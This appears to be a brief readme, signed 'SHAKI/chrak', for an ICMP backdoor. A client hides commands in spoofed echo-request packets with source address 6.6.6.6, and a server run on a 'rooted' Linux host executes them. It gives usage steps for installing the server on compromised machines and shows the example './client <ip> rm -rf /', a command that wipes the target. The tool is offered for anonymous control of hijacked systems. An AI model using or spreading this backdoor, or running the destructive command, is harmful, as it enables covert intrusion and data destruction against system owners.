the client attaches a string to the end of the icmp header, sets the ip src addr
to 6.6.6.6 and icmp type to 8.
the server which should be running on a linux system
when it receives the icmp packet it will exec the string that was attached by
the client.
Just ./server
on the rooted system.
and to exec commands on it completely anonymously you can:
./client <ip addr of system> rm -rf /
or anything else. This is only one way though and you can not see the executed
programs output.
	-SHAKI/chrak
